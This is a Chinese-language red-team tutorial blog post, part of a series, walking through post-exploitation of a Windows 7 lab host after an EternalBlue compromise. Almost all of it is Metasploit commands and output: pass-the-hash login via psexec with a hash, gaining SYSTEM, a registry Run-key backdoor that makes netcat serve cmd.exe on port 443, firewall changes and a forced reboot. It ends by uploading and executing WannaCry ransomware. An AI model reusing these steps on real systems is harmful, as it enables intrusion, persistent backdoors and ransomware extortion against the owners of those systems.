首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >红队/白帽必经之路(21)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 PC 进行渗透进而达到勒索[既然是红队,那就对自己狠一点]

红队/白帽必经之路(21)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 PC 进行渗透进而达到勒索[既然是红队,那就对自己狠一点]

作者头像
盛透侧视攻城狮
发布2024-12-25 09:24:37
发布2024-12-25 09:24:37
2070
举报

1.4话接上集session保存在后台之后

使用 hash 值登录系统
代码语言:javascript
复制
msf6 exploit(multi/handler) > back
msf6 >  use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) >  set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.1.56
RHOSTS => 192.168.1.56
msf6 exploit(windows/smb/psexec) > set LHOST 192.168.1.53
配置用户信息
代码语言:javascript
复制
msf6 exploit(windows/smb/psexec) > set SMBUser xuegod
SMBUser => xuegod
密码使用哈希值
代码语言:javascript
复制
msf6 exploit(windows/smb/psexec) > set SMBPass   aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
SMBPass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(windows/smb/psexec) > set SMBDomain WORKGROUP
补充说明:

  • 这里局域网中 SMBDomain 都是 WORKGROUP 如果是域用户需要配置域名称。
代码语言:javascript
复制
msf6 exploit(windows/smb/psexec) > set SMBDomain WORKGROUP
SMBDomain => WORKGROUP
msf6 exploit(windows/smb/psexec) > exploit
bash汇总:
代码语言:javascript
复制
msf6 exploit(multi/handler) > back
msf6 >  use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) >  set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.1.56
RHOSTS => 192.168.1.56
msf6 exploit(windows/smb/psexec) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(windows/smb/psexec) > set SMBUser xuegod
SMBUser => xuegod
msf6 exploit(windows/smb/psexec)  set SMBPass
[-] Unknown command: 密�
msf6 exploit(windows/smb/psexec) > set SMBPass   aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
SMBPass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(windows/smb/psexec) > set SMBDomain WORKGROUP
SMBDomain => WORKGROUP
msf6 exploit(windows/smb/psexec) > exploit
可以发现虽然我们使用 xuegod 用户进行认证但是我们同样获取到了 SYSTEM 的权限
代码语言:javascript
复制
meterpreter > getuid
接着配置后门程序,修改 UAC 的注册表
注意:
  • 需要重启才能生效
  • 上传 nc 到 Win7
代码语言:javascript
复制
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
  • 注册表添加启动项执行 nc 反弹 shell 命令
代码语言:javascript
复制
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
nc参数说明:
  • L 表示用户退出连接后重新进行端口侦听
  • d 后台运行
  • p 指定端口
  • -e prog 程序重定向,一旦连接,就执行
代码语言:javascript
复制
meterpreter > shell
补充:
  • 防火墙允许 443 端口访问网络否则开机的时需要用户点击允许访问网络才可以成功执行。
代码语言:javascript
复制
C:\Windows\system32> netsh firewall add portopening TCP 443 "xuegod443" ENABLE
ALL
重启 Win7
代码语言:javascript
复制
C:\Windows\system32>shutdown -r -f -t 0


-r 重启

-f 强制

-t 时间 0 表示立刻
等待系统生成到:
  • 需要用户进入系统后,后门程序,才可以使用。
  • 所以在这个锁屏的界面,我们的后门程序还没有运行。
查看后门:
代码语言:javascript
复制
C:\Users\xiangsi>netsatt -an
新建一个终端使用 nc 进行连接后门
代码语言:javascript
复制
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# nc -v 192.168.1.56 443
代码语言:javascript
复制
C:\Windows\SysWOW64>exit
MSF 控制台连接
代码语言:javascript
复制
msf6 > connect 192.168.1.56 443
退出,使用 Ctrl+c 退出即可

2.扩展

前面可以上传 nc 程序,当然也可以上传勒索病毒过程如下:​​​​​​​
1、上传勒索文件至 C 盘根目录下,为了隐蔽可以传至更隐蔽目录​​​​​​​
代码语言:javascript
复制
upload wannacry.exe c:\
2、执行勒索可执行文件即可
代码语言:javascript
复制
execute -f c:\wannacry.exe
  • 至此,成功勒索............
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-12-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 1.4话接上集session保存在后台之后
    • 使用 hash 值登录系统
    • 配置用户信息
    • 密码使用哈希值
      • 补充说明:
    • bash汇总:
    • 可以发现虽然我们使用 xuegod 用户进行认证但是我们同样获取到了 SYSTEM 的权限
    • 接着配置后门程序,修改 UAC 的注册表
      • 注意:
      • nc参数说明:
      • 补充:
    • 重启 Win7
      • 等待系统生成到:
    • 查看后门:
    • 新建一个终端使用 nc 进行连接后门
    • MSF 控制台连接
    • 退出,使用 Ctrl+c 退出即可
  • 2.扩展
    • 前面可以上传 nc 程序,当然也可以上传勒索病毒过程如下:​​​​​​​
      • 1、上传勒索文件至 C 盘根目录下,为了隐蔽可以传至更隐蔽目录​​​​​​​
      • 2、执行勒索可执行文件即可
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档